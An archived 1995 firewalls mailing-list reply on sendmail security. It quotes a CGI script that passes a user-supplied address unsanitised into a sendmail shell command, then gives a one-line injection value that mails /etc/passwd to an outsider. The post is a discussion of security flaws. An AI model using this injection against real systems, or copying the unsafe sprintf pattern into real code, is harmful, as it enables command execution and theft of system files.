Firewalls: Re: Secure version of Sendmail

Firewalls
(September 1995)

Indexed By Thread: [Previous] [Next]

Subject:	Re: Secure version of Sendmail
From:	peter @ nmti . com (Peter da Silva)
Date:	Thu, 14 Sep 1995 11:16:27 -0500 (CDT)
To:	smith @ sctc . com (Rick Smith)
Cc:	firewalls @ greatcircle . com
In-reply-to:	<199509141427 . JAA17333 @ shade . sctc . com> from "Rick Smith" at Sep 14, 95 09:27:19 am

> True enough. The point is, you have to identify and exploit
> appropriate holes in both sendmail and in the nonbypassible access
> control mechanism of the OS. A properly designed mechanism is going to
> present a different kind of penetration problem.

The point is that if you have a class B O/S you're more likely to skimp
on the application level stuff. If you get both, that's great, but you
usually only get one.

I just found another:

	sprintf(txt, "sendmail -f %s %s < %s",
		user_provided_string, server_provided_string, tempname);

in a web server CGI script.

Just pop "; mail phreak < /etc/passwd" in as your address...

Follow-Ups:

Re: Secure version of Sendmail
From: mdr @ vodka . sse . att . com
Re: Secure version of Sendmail
From: Rick Smith <smith @ sctc . com>

References:

Re: Secure version of Sendmail
From: Rick Smith <smith @ sctc . com>

Indexed By Date	Previous:	User Authentication & encryption From: padgett @ tccslr . dnet . mmc . com (A. Padgett Peterson, P.E. Information Security)
Indexed By Date	Next:	Firewall off Rod McBan DCLVI From: padgett @ tccslr . dnet . mmc . com (A. Padgett Peterson, P.E. Information Security)
Indexed By Thread	Previous:	Re: Secure version of Sendmail From: Rick Smith <smith @ sctc . com>
Indexed By Thread	Next:	Re: Secure version of Sendmail From: Rick Smith <smith @ sctc . com>